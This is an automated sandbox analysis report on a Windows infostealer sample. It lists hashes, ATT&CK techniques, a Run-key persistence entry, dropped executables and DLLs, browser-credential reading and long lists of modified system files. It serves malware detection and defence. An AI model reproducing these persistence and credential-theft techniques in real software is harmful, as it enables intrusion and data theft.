42581f5bea73e151c2b1b1156133709d95f21f6cf6779d0ee20a873b9925c60c

Analysis

max time kernel
118s
max time network
123s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 23:09 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2f6d0f943d6a0bc76f573a6686008cc0N.exe
Size

75KB
MD5

2f6d0f943d6a0bc76f573a6686008cc0
SHA1

2dc234f1fbe8dcb4731f4edd5cbf5b8fa71039b1
SHA256

42581f5bea73e151c2b1b1156133709d95f21f6cf6779d0ee20a873b9925c60c
SHA512

1ffd09748252255d4c6955c3c8911518cb116f0226f2590ddf5d854f6b0a117c33cad21dad01ada32ce4c35b1a531909dda4c4e4822ad3219afebea5d998864a
SSDEEP

1536:Xx1Qja7luy6y0s4sqfkbnAKBOKofHfHTXQLzgvnzHPowYbvrjD/L7QPbg/Dr0T3B:BOjWuyt0ZsqsXOKofHfHTXQLzgvnzHPp

Score

8^/10

discovery persistence spyware stealer

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\drivers\gmreadme.txt	smnss.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0008000000023465-9.dat	acprotect

Executes dropped EXE 2 IoCs

pid	Process
3124	ctfmen.exe
4092	smnss.exe

Loads dropped DLL 2 IoCs

pid	Process
2508	2f6d0f943d6a0bc76f573a6686008cc0N.exe
4092	smnss.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen = "C:\\Windows\\system32\\ctfmen.exe"	smnss.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen = "C:\\Windows\\system32\\ctfmen.exe"	2f6d0f943d6a0bc76f573a6686008cc0N.exe

Enumerates connected drives 3 TTPs 19 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	smnss.exe
File opened (read-only)	\??\L:	smnss.exe
File opened (read-only)	\??\O:	smnss.exe
File opened (read-only)	\??\S:	smnss.exe
File opened (read-only)	\??\V:	smnss.exe
File opened (read-only)	\??\W:	smnss.exe
File opened (read-only)	\??\G:	smnss.exe
File opened (read-only)	\??\K:	smnss.exe
File opened (read-only)	\??\U:	smnss.exe
File opened (read-only)	\??\X:	smnss.exe
File opened (read-only)	\??\H:	smnss.exe
File opened (read-only)	\??\Q:	smnss.exe
File opened (read-only)	\??\E:	smnss.exe
File opened (read-only)	\??\I:	smnss.exe
File opened (read-only)	\??\M:	smnss.exe
File opened (read-only)	\??\N:	smnss.exe
File opened (read-only)	\??\P:	smnss.exe
File opened (read-only)	\??\R:	smnss.exe
File opened (read-only)	\??\T:	smnss.exe

Maps connected drives based on registry 3 TTPs 6 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	smnss.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\1	smnss.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\1	2f6d0f943d6a0bc76f573a6686008cc0N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	smnss.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms014.inf_amd64_faec3fc366f8e1fa\Amd64\MSMPS-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\icsxml\cmnicfg.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\icsxml\potscfg.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc	smnss.exe
File opened for modification	C:\Windows\SysWOW64\Recovery\ReAgent.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\Speech_OneCore\Common\en-US\tokens_TTS_en-US_david.xml	smnss.exe
File created	C:\Windows\SysWOW64\grcopy.dll	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_a7412a554c9bc1fd\MPDW-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms014.inf_amd64_faec3fc366f8e1fa\Amd64\MSMPS.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\satornas.dll	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms006.inf_amd64_c3bdcb6fc975b614\SendToOneNote-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms011.inf_amd64_f83138380f5fb6ab\Amd64\MSAppMon.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_a7412a554c9bc1fd\MPDW-PDC.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\F12\Timeline.cpu.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\Speech_OneCore\Common\en-US\tokens_TTS_en-US.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_x86_360f6f3a7c4b3433\I386\unishare-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_8bbf44975c626ac5\Amd64\MSPWGR.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_8bbf44975c626ac5\Amd64\MSXPS2.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\AppxProvisioning.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms012.inf_amd64_707d3849370b9d23\Amd64\MSIPP.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\default.help.txt	smnss.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\default.help.txt	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms004.inf_amd64_c28ee88ec1bd4178\Amd64\unisharev4-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms005.inf_amd64_add71423ba73e797\Amd64\MSxpsPS-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\tsprint.inf_amd64_6066bc96a5f28b44\tsprint-PipelineConfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_8bbf44975c626ac5\Amd64\MSPWGR-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\MailContactsCalendarSync\LiveDomainList.txt	smnss.exe
File opened for modification	C:\Windows\SysWOW64\wbem\xsl-mappings.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\ctfmen.exe	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File opened for modification	C:\Windows\SysWOW64\shervans.dll	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File created	C:\Windows\SysWOW64\zipfiaq.dll	smnss.exe
File created	C:\Windows\SysWOW64\smnss.exe	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_0e2452f597790e95\Amd64\unishare-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_a7412a554c9bc1fd\MPDW_devmode_map.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\default.help.txt	smnss.exe
File opened for modification	C:\Windows\SysWOW64\wsmanconfig_schema.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms008.inf_amd64_69b5e0c918eab9a6\Amd64\unishare3d-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\default.help.txt	smnss.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\default.help.txt	smnss.exe
File opened for modification	C:\Windows\SysWOW64\Speech_OneCore\Common\en-US\Tokens_SR_en-US-N.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\WindowsCodecsRaw.txt	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc1bda6cf47380c\MXDW-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms005.inf_amd64_add71423ba73e797\Amd64\MSxpsPCL6-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\NdfEventView.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms010.inf_amd64_9e410195c3b236c9\Amd64\MSECP.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms012.inf_amd64_707d3849370b9d23\Amd64\MSIPP-pipelineconfig.xml	smnss.exe
File created	C:\Windows\SysWOW64\smnss.exe	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File created	C:\Windows\SysWOW64\zipfi.dll	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms010.inf_amd64_9e410195c3b236c9\Amd64\MSECP-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\default.help.txt	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\ntprint4.inf_amd64_0958c7cad3cd6075\Amd64\V3HostingFilter-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms005.inf_amd64_add71423ba73e797\Amd64\MSxpsXPS-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms011.inf_amd64_f83138380f5fb6ab\Amd64\MSAppMon-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\Speech_OneCore\Common\tokens.xml	smnss.exe
File created	C:\Windows\SysWOW64\ctfmen.exe	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_8bbf44975c626ac5\Amd64\MSPassthrough-pipelineconfig.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\icsxml\ipcfg.xml	smnss.exe
File created	C:\Windows\SysWOW64\shervans.dll	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File created	C:\Windows\SysWOW64\satornas.dll	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File opened for modification	C:\Windows\SysWOW64\IME\IMEJP\APPLETS\IMJPCLST.XML	smnss.exe
File opened for modification	C:\Windows\SysWOW64\grcopy.dll	2f6d0f943d6a0bc76f573a6686008cc0N.exe
File opened for modification	C:\Windows\SysWOW64\icsxml\osinfo.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\icsxml\pppcfg.xml	smnss.exe
File opened for modification	C:\Windows\SysWOW64\tcpbidi.xml	smnss.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_2019.807.41.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmmui.msi.16.en-us.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN065.XML	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\MCABOUT.HTM	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\Client.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL115.XML	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub2019_eula.txt	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\TPN.txt	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.2.2_2.2.27405.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\Assets\OfflinePages\WebviewOffline.html	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\telemetryrules\hxcalendarappimm.exe_Rules.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.office32mui.msi.16.en-us.xml	smnss.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\Office16\OSPP.HTM	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_WHATSNEW.XML	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\ServiceWatcherSchedule.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml	smnss.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz.txt	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\fi-FI\View3d\3DViewerProductDescription-universal.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\uk-UA\View3d\3DViewerProductDescription-universal.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML	smnss.exe
File opened for modification	C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceTigrinya.txt	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\AugLoop\third-party-notices.txt	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\PersonaSpy.html	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nl.txt	smnss.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AuthoredExtensions.16.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN086.XML	smnss.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_BeforeEach_AfterEach.help.txt	smnss.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mr.txt	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.powerpointmui.msi.16.en-us.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ro-RO\View3d\3DViewerProductDescription-universal.xml	smnss.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\excluded.txt	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ml-IN\View3d\3DViewerProductDescription-universal.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.7_1.7.25531.0_x64__8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\cs-CZ\View3d\3DViewerProductDescription-universal.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN114.XML	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\FrameworkList.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\hr-HR\View3d\3DViewerProductDescription-universal.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ru-RU\View3d\3DViewerProductDescription-universal.xml	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\BRANDING.XML	smnss.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.1813.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	smnss.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	smnss.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green Yellow.xml	smnss.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\speech\4009\tokens_enIN.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-bits-client-core_31bf3856ad364e35_10.0.19041.1266_none_9b0ab05d400833e1\f\315818c03ccc2b10070df2d4ebd09eb6c4c66e58.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.19041.1_es-es_12451df02dbd2879\403-10.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..osoftedge.resources_31bf3856ad364e35_10.0.19041.1_de-de_fa3317ce4cfa58b0\needhvsi.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..osoftedge.resources_31bf3856ad364e35_10.0.19041.1_en-us_a323edc73bd86475\pdferrorquitapplicationguard.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-o..ectionflow.appxmain_31bf3856ad364e35_10.0.19041.423_none_0b0196a3d38fda4e\tokens_enGB.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_en-us_6bac97f839f3675b\Report.System.Configuration.xml	smnss.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\App_Data\GroupedProviders.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_10.0.19041.173_none_af877ec0b0472fde\base_kor.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-r..t-office-protectors_31bf3856ad364e35_10.0.19041.1_none_c3bc3dbd94da3c61\MsoIrmProtector.doc	smnss.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\unifiedEnrollment\views\unifiedEnrollmentOnPremAuth.html	smnss.exe
File opened for modification	C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\AppxManifest.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_dual_prnms007.inf_31bf3856ad364e35_10.0.19041.1_none_70cec824c55a4876\Amd64\MSXPS2.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_10.0.19041.1_es-es_12451df02dbd2879\401-1.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-o..ectionflow.appxmain_31bf3856ad364e35_10.0.19041.423_none_0b0196a3d38fda4e\tokens_enUS.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-sharedaccess_31bf3856ad364e35_10.0.19041.1_none_c513167c1d0a90dd\cmnicfg.xml	smnss.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\es-ES\assets\OfflineTabs\OfflineTabs.html	smnss.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\uk-UA\assets\ErrorPages\startfresh.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_hyperv-vmchipset_31bf3856ad364e35_10.0.19041.153_none_b32940cfeb827fac\VmChipset Third-Party Notices.txt	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-a..modernappmanagement_31bf3856ad364e35_10.0.19041.746_none_8d1567f5900ba80a\EnterpriseModernAppManagementDDF.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.117_none_e0d32848ac56114e\oobeFooterHost.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-onecoreuap-wlansvc_31bf3856ad364e35_10.0.19041.153_none_20cb28a4512c2591\Rules.System.Wireless.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-t..riventextservice-yi_31bf3856ad364e35_10.0.19041.1_none_01c32b9392659611\TableTextServiceYi.txt	smnss.exe
File opened for modification	C:\Windows\PLA\Reports\en-US\Report.System.Memory.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_es-es_6b77f4dc3a1a5900\Rules.System.Memory.xml	smnss.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\speech\4009\tokens_enIN.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-ecapp.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_6d4be35dd691e117\f\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..osoftedge.resources_31bf3856ad364e35_10.0.19041.1_it-it_2fceb6f1060351fa\forbidframingedge.htm	smnss.exe
File opened for modification	C:\Windows\PLA\Reports\en-US\Report.System.Common.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..osoftedge.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_cd2d1cde69f392b4\http_406.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_0e2f6adb2cec6f62\Rules.System.Disk.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft.configci.commands_31bf3856ad364e35_10.0.19041.1081_none_21d54f6a980a590b\AllowMicrosoft.xml	smnss.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\ROMANIAN.TXT	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..e.desktop.searchapp_31bf3856ad364e35_10.0.19041.1_none_43fe9f4e368e081f\29.txt	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_10.0.19041.173_none_af877ec0b0472fde\insert.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-a..gement-uevtemplates_31bf3856ad364e35_10.0.19041.1_none_0d66b54875835a49\MicrosoftOutlook2013CAWin32.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-a..tscontrol.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_bcf0807cccfa0873\AppxBlockMap.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\inspect.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..osoftedge.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_45a6c0aa2ed16c7c\PhishSiteEdge.htm	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-o..ectionflow.appxmain_31bf3856ad364e35_10.0.19041.423_none_0b0196a3d38fda4e\tokens_esMX.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..g-fdprint.resources_31bf3856ad364e35_10.0.19041.1_es-es_2509cf5229985120\resource.xml	smnss.exe
File opened for modification	C:\Windows\diagnostics\index\DeviceDiagnostic.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\oobe-listview-template.html	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_0e2f6adb2cec6f62\Report.System.Disk.xml	smnss.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_10.0.19041.173_none_af877ec0b0472fde\base_altgr.xml	smnss.exe
File opened for modification	C:\Windows\PLA\Rules\it-IT\Rules.System.Wireless.xml	smnss.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Desktop\21.txt	smnss.exe
